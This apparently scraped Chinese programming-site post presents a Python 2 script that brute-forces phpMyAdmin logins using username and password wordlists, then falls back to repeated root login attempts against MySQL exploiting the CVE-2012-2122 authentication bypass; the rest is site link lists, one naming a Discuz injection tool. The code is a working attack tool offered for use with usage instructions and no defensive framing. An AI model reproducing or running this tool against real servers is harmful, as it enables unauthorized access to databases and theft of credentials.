Python写的PHPMyAdmin暴力破解工具代码


Posted in Python onAugust 06, 2014

PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用。

#!/usr/bin/env python
import urllib 
import urllib2 
import cookielib 
import sys
import subprocess
def Crack(url,username,password):
	opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())) 
	headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}
	params = urllib.urlencode({'pma_username': username, 'pma_password': password})
	request = urllib2.Request(url+"/index.php", params,headers)
	response = opener.open(request) 
	a=response.read() 
	if a.find('Database server')!=-1 and a.find('name="login_form"')==-1:
		return username,password
	return 0
def MySQLAuthenticationBypassCheck(host,port):
	i=0
	while i<300:
		i=i+1
		subprocess.Popen("mysql --host=%s -P %s -uroot -piswin" % (host,port),shell=True).wait()
if __name__ == '__main__':
	if len(sys.argv)<4:
		print "#author:iswin\n#useage python pma.py https://3water.com/phpmyadmin/ username.txt password.txt"
		sys.exit()
	print "Bruting,Pleas wait..."
	for name in open(sys.argv[2],"r"):
		for passw in open(sys.argv[3],"r"):
			state=Crack(sys.argv[1],name,passw)
			if state!=0:
				print "\nBrute successful"
				print "UserName: "+state[0]+"PassWord: "+state[1]
				sys.exit()
	print "Sorry,Brute failed...,try to use MySQLAuthenticationBypassCheck"
	choice=raw_input('Warning:This function needs mysql environment.\nY:Try to MySQLAuthenticationBypassCheck\nOthers:Exit\n')
	if choice=='Y' or choice=='y':
		host=raw_input('Host:')
		port=raw_input('Port:')
		MySQLAuthenticationBypassCheck(host,port)
Python 相关文章推荐
Python实现的HTTP并发测试完整示例
Apr 23 Python
python实现基本进制转换的方法
Jul 11 Python
python装饰器实例大详解
Oct 25 Python
用Python实现KNN分类算法
Dec 22 Python
python3连接MySQL数据库实例详解
May 24 Python
python占位符输入方式实例
May 27 Python
python3用PIL把图片转换为RGB图片的实例
Jul 04 Python
python 三元运算符使用解析
Sep 16 Python
new_zeros() pytorch版本的转换方式
Feb 18 Python
浅谈Pytorch中的自动求导函数backward()所需参数的含义
Feb 29 Python
python输出第n个默尼森数的实现示例
Mar 08 Python
python反扒机制的5种解决方法
Feb 06 Python
Python写的Discuz7.2版faq.php注入漏洞工具
Aug 06 #Python
Python常用列表数据结构小结
Aug 06 #Python
Python生成pdf文件的方法
Aug 04 #Python
Tornado Web服务器多进程启动的2个方法
Aug 04 #Python
Python通过解析网页实现看报程序的方法
Aug 04 #Python
基于Python实现的扫雷游戏实例代码
Aug 01 #Python
python脚本实现查找webshell的方法
Jul 31 #Python
You might like
php xml-rpc远程调用
2008/12/19 PHP
数据库中排序的对比及使用条件详解
2012/02/23 PHP
PHP文件上传判断file是否己选择上传文件的方法
2014/11/10 PHP
PHP中使用SimpleXML检查XML文件结构实例
2015/01/07 PHP
thinkPHP5框架自定义验证器实现方法分析
2018/06/11 PHP
PHP面向对象程序设计模拟一般面向对象语言中的方法重载(overload)示例
2019/06/13 PHP
js资料toString 方法
2007/03/13 Javascript
超级酷和最实用的jQuery实例收集(20个)
2010/04/21 Javascript
JavaScript 笔记二 Array和Date对象方法
2010/05/22 Javascript
判断iframe里的页面是否加载完成
2014/06/06 Javascript
jQuery实现切换字体大小的方法
2015/03/10 Javascript
纯javascript实现分页(两种方法)
2015/08/26 Javascript
js与jQuery实现checkbox复选框全选/全不选的方法
2016/01/05 Javascript
JSON简介以及用法汇总
2016/02/21 Javascript
Bootstrap页面布局基础知识全面解析
2016/06/13 Javascript
JavaScript获取服务器端时间的方法
2016/11/29 Javascript
JavaScript中最常见的三个面试题解析
2017/03/04 Javascript
javascript 判断用户有没有操作页面
2017/10/17 Javascript
Vue不能观察到数组length的变化
2018/06/08 Javascript
jQuery实现的记住帐号密码功能完整示例
2019/08/03 jQuery
[07:40]DOTA2每周TOP10 精彩击杀集锦vol.4
2014/06/25 DOTA
如何使用七牛Python SDK写一个同步脚本及使用教程
2015/08/23 Python
python利用wx实现界面按钮和按钮监听和字体改变的方法
2019/07/17 Python
python 有效的括号的实现代码示例
2019/11/11 Python
Python scrapy爬取小说代码案例详解
2020/07/09 Python
美国著名的团购网站:Woot
2016/08/02 全球购物
香港最大的洋酒零售连锁店:屈臣氏酒窖(Watson’s Wine)
2018/12/10 全球购物
How to spawning asynchronous work in J2EE
2016/08/29 面试题
前台接待员岗位职责
2014/01/02 职场文书
合伙购房协议样本
2014/10/06 职场文书
办公楼租房协议书范本
2014/11/25 职场文书
公务员年终个人总结
2015/02/12 职场文书
2015年幼儿园后勤工作总结
2015/04/25 职场文书
就业证明函
2015/06/17 职场文书
小学开学典礼新闻稿
2015/07/17 职场文书
关于感恩的作文
2019/08/26 职场文书